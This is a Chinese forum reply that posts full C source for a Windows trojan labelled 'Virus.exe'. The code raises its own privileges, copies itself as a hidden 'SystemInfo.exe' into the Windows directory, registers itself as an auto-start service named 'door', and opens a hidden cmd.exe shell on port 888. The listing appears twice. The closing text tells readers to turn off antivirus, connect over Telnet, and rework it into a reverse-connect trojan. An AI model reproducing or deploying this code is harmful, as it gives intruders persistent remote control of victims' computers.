|
#2
sharplong2017-04-15 16:16
|
程序代码:// 实验 : Virus.exe
// 作者 : GodisCodeLife
// 完成时间 : 一周
#include <Stdio.h>
#include <Winsock2.h>
#include <Windows.h>
#include <Tlhelp32.h>
#pragma comment(lib, "Ws2_32.lib")
VOID DebugPrivilege();
VOID CloseHandle(DWORD dwPid);
DWORD GetProcessId(char *szProcessName);
VOID EnterService();
VOID Telnetdoor();
int main(int argc, char **argv)
{
// 自身目录
char szCurrDir[MAX_PATH] = { 0 };
GetModuleFileName(NULL, szCurrDir, MAX_PATH);
int ch = '\\';
char *pFileName = strrchr(szCurrDir, ch);
int nLen = strlen(szCurrDir) - strlen(pFileName);
szCurrDir[nLen] = NULL;
DebugPrivilege();
EnterService();
DWORD dwPid = GetProcessId(pFileName);
Telnetdoor();
CloseHandle(dwPid);
return 0;
}
// 提升限权
VOID DebugPrivilege()
{
HANDLE hToken = NULL;
// 打开令牌
BOOL bRet = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);
if ( bRet == TRUE )
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
CloseHandle(hToken);
}
}
// PID获取
DWORD GetProcessId(char *szProcessName)
{
DWORD dwPid = 0;
BOOL bRet = 0;
PROCESSENTRY32 pe32 = { 0 };
pe32.dwSize = sizeof(PROCESSENTRY32);
// 获取进程列表
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
// 查找进程
bRet = Process32First(hSnap, &pe32);
while ( bRet )
{
if ( strcmp(pe32.szExeFile, szProcessName) == 0 )
{
break;
}
bRet = Process32Next(hSnap, &pe32);
}
dwPid = pe32.th32ProcessID;
return dwPid;
}
// 结束某进程
VOID CloseHandle(DWORD dwPid)
{
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
TerminateProcess(hProcess, 0);
CloseHandle(hProcess);
}
// 驱动木马服务自启动
VOID EnterService()
{
char szFileName[MAX_PATH] = { 0 };
GetModuleFileName(NULL, szFileName, MAX_PATH);
// 打开服务管理
SC_HANDLE scHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
SC_HANDLE scHandleOpen = OpenService(scHandle, "door", SERVICE_ALL_ACCESS);
if ( scHandleOpen == NULL )
{
char szSelfFile[MAX_PATH] = { 0 };
char szSystemPath[MAX_PATH] = { 0 };
GetWindowsDirectory(szSystemPath, MAX_PATH);
strcat(szSystemPath, "\\SystemInfo.exe");
GetModuleFileName(NULL, szSelfFile, MAX_PATH);
CopyFile(szSelfFile, szSystemPath, FALSE);
SetFileAttributes(szSystemPath, FILE_ATTRIBUTE_HIDDEN);
// 创建木马服务
SC_HANDLE scNewHandle = CreateService(scHandle,
"door",
"door",
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
szSystemPath,
NULL,
NULL,
NULL,
NULL,
NULL);
// 启动木马服务
StartService(scNewHandle, 0, NULL);
CloseServiceHandle(scNewHandle);
}
CloseServiceHandle(scHandleOpen);
CloseServiceHandle(scHandle);
}
// 实现CMD远程控制
VOID Telnetdoor()
{
WSADATA wsa;
WSAStartup(MAKEWORD(2, 2), &wsa);
// 创建套接字
SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
// 填充信息
sockaddr_in sock;
sock.sin_family = AF_INET;
sock.sin_addr.S_un.S_addr = ADDR_ANY;
sock.sin_port = htons(888);
bind(s, (SOCKADDR *)&sock, sizeof(SOCKADDR));
listen(s, 1);
// 接受连接
sockaddr_in sockClient;
int SaddrSize = sizeof(SOCKADDR);
SOCKET sc = accept(s, (SOCKADDR *)&sockClient, &SaddrSize);
// 创建管道
SECURITY_ATTRIBUTES sa1, sa2;
HANDLE hRead1, hRead2, hWrite1, hWrite2;
sa1.nLength = sizeof(SECURITY_ATTRIBUTES);
sa1.lpSecurityDescriptor = NULL;
sa1.bInheritHandle = TRUE;
sa2.nLength = sizeof(SECURITY_ATTRIBUTES);
sa2.lpSecurityDescriptor = NULL;
sa2.bInheritHandle = TRUE;
CreatePipe(&hRead1, &hWrite1, &sa1, 0);
CreatePipe(&hRead2, &hWrite2, &sa2, 0);
// 创建用于通信的子程序
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
// 管道1用于输出
// 管道2用于输入
si.hStdInput = hRead2;
si.hStdOutput = hWrite1;
si.hStdError = hWrite1;
char *szCmd = "cmd";
// 创建子进程
CreateProcess(NULL, szCmd, NULL, NULL,
TRUE, 0, NULL, NULL, &si, &pi);
// 定义输入\输出大小
DWORD dwBytes = 0;
BOOL bRet = FALSE;
char szBuffer[0x1000] = { 0 };
char szCommand[0x1000] = { 0 };
// 循环接受命令
while ( TRUE )
{
// 发送命令
ZeroMemory(szCommand, 0x1000);
bRet = PeekNamedPipe(hRead1, szBuffer, 0x1000, &dwBytes, 0, 0);
if ( dwBytes )
{
ReadFile(hRead1, szBuffer, 0x1000, &dwBytes, NULL);
send(sc, szBuffer, dwBytes, 0);
}
else
{
int i = 0;
while ( 1 )
{
// 接受回显
dwBytes = recv(sc, szBuffer, 0x1000, 0);
if ( dwBytes <= 0)
{
break;
}
szCommand[i++] = szBuffer[0];
if ( szBuffer[0] == '\r' || szBuffer[0] == '\n' )
{
szCommand[i-1] = '\n';
break;
}
}
// 写入管道
WriteFile(hWrite2, szCommand, i, &dwBytes, NULL);
}
}
WSACleanup();
}
// 作者 : GodisCodeLife
// 完成时间 : 一周
#include <Stdio.h>
#include <Winsock2.h>
#include <Windows.h>
#include <Tlhelp32.h>
#pragma comment(lib, "Ws2_32.lib")
VOID DebugPrivilege();
VOID CloseHandle(DWORD dwPid);
DWORD GetProcessId(char *szProcessName);
VOID EnterService();
VOID Telnetdoor();
int main(int argc, char **argv)
{
// 自身目录
char szCurrDir[MAX_PATH] = { 0 };
GetModuleFileName(NULL, szCurrDir, MAX_PATH);
int ch = '\\';
char *pFileName = strrchr(szCurrDir, ch);
int nLen = strlen(szCurrDir) - strlen(pFileName);
szCurrDir[nLen] = NULL;
DebugPrivilege();
EnterService();
DWORD dwPid = GetProcessId(pFileName);
Telnetdoor();
CloseHandle(dwPid);
return 0;
}
// 提升限权
VOID DebugPrivilege()
{
HANDLE hToken = NULL;
// 打开令牌
BOOL bRet = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);
if ( bRet == TRUE )
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
CloseHandle(hToken);
}
}
// PID获取
DWORD GetProcessId(char *szProcessName)
{
DWORD dwPid = 0;
BOOL bRet = 0;
PROCESSENTRY32 pe32 = { 0 };
pe32.dwSize = sizeof(PROCESSENTRY32);
// 获取进程列表
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
// 查找进程
bRet = Process32First(hSnap, &pe32);
while ( bRet )
{
if ( strcmp(pe32.szExeFile, szProcessName) == 0 )
{
break;
}
bRet = Process32Next(hSnap, &pe32);
}
dwPid = pe32.th32ProcessID;
return dwPid;
}
// 结束某进程
VOID CloseHandle(DWORD dwPid)
{
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
TerminateProcess(hProcess, 0);
CloseHandle(hProcess);
}
// 驱动木马服务自启动
VOID EnterService()
{
char szFileName[MAX_PATH] = { 0 };
GetModuleFileName(NULL, szFileName, MAX_PATH);
// 打开服务管理
SC_HANDLE scHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
SC_HANDLE scHandleOpen = OpenService(scHandle, "door", SERVICE_ALL_ACCESS);
if ( scHandleOpen == NULL )
{
char szSelfFile[MAX_PATH] = { 0 };
char szSystemPath[MAX_PATH] = { 0 };
GetWindowsDirectory(szSystemPath, MAX_PATH);
strcat(szSystemPath, "\\SystemInfo.exe");
GetModuleFileName(NULL, szSelfFile, MAX_PATH);
CopyFile(szSelfFile, szSystemPath, FALSE);
SetFileAttributes(szSystemPath, FILE_ATTRIBUTE_HIDDEN);
// 创建木马服务
SC_HANDLE scNewHandle = CreateService(scHandle,
"door",
"door",
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
szSystemPath,
NULL,
NULL,
NULL,
NULL,
NULL);
// 启动木马服务
StartService(scNewHandle, 0, NULL);
CloseServiceHandle(scNewHandle);
}
CloseServiceHandle(scHandleOpen);
CloseServiceHandle(scHandle);
}
// 实现CMD远程控制
VOID Telnetdoor()
{
WSADATA wsa;
WSAStartup(MAKEWORD(2, 2), &wsa);
// 创建套接字
SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
// 填充信息
sockaddr_in sock;
sock.sin_family = AF_INET;
sock.sin_addr.S_un.S_addr = ADDR_ANY;
sock.sin_port = htons(888);
bind(s, (SOCKADDR *)&sock, sizeof(SOCKADDR));
listen(s, 1);
// 接受连接
sockaddr_in sockClient;
int SaddrSize = sizeof(SOCKADDR);
SOCKET sc = accept(s, (SOCKADDR *)&sockClient, &SaddrSize);
// 创建管道
SECURITY_ATTRIBUTES sa1, sa2;
HANDLE hRead1, hRead2, hWrite1, hWrite2;
sa1.nLength = sizeof(SECURITY_ATTRIBUTES);
sa1.lpSecurityDescriptor = NULL;
sa1.bInheritHandle = TRUE;
sa2.nLength = sizeof(SECURITY_ATTRIBUTES);
sa2.lpSecurityDescriptor = NULL;
sa2.bInheritHandle = TRUE;
CreatePipe(&hRead1, &hWrite1, &sa1, 0);
CreatePipe(&hRead2, &hWrite2, &sa2, 0);
// 创建用于通信的子程序
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
// 管道1用于输出
// 管道2用于输入
si.hStdInput = hRead2;
si.hStdOutput = hWrite1;
si.hStdError = hWrite1;
char *szCmd = "cmd";
// 创建子进程
CreateProcess(NULL, szCmd, NULL, NULL,
TRUE, 0, NULL, NULL, &si, &pi);
// 定义输入\输出大小
DWORD dwBytes = 0;
BOOL bRet = FALSE;
char szBuffer[0x1000] = { 0 };
char szCommand[0x1000] = { 0 };
// 循环接受命令
while ( TRUE )
{
// 发送命令
ZeroMemory(szCommand, 0x1000);
bRet = PeekNamedPipe(hRead1, szBuffer, 0x1000, &dwBytes, 0, 0);
if ( dwBytes )
{
ReadFile(hRead1, szBuffer, 0x1000, &dwBytes, NULL);
send(sc, szBuffer, dwBytes, 0);
}
else
{
int i = 0;
while ( 1 )
{
// 接受回显
dwBytes = recv(sc, szBuffer, 0x1000, 0);
if ( dwBytes <= 0)
{
break;
}
szCommand[i++] = szBuffer[0];
if ( szBuffer[0] == '\r' || szBuffer[0] == '\n' )
{
szCommand[i-1] = '\n';
break;
}
}
// 写入管道
WriteFile(hWrite2, szCommand, i, &dwBytes, NULL);
}
}
WSACleanup();
}
编译连接运行这个木马(关闭杀毒软件), 然后打开CMD,用Telnet命令连接这个木马。
如果不会Telnet命令的朋友可以上网查找详细用法。
事例: Telnet 中木马的IP地址 888
由于程序中绑定的是888端口,所以必须连接888端口才有效。
如果有能力的学友,可以将其更改成反弹式木马,那样就更完美了。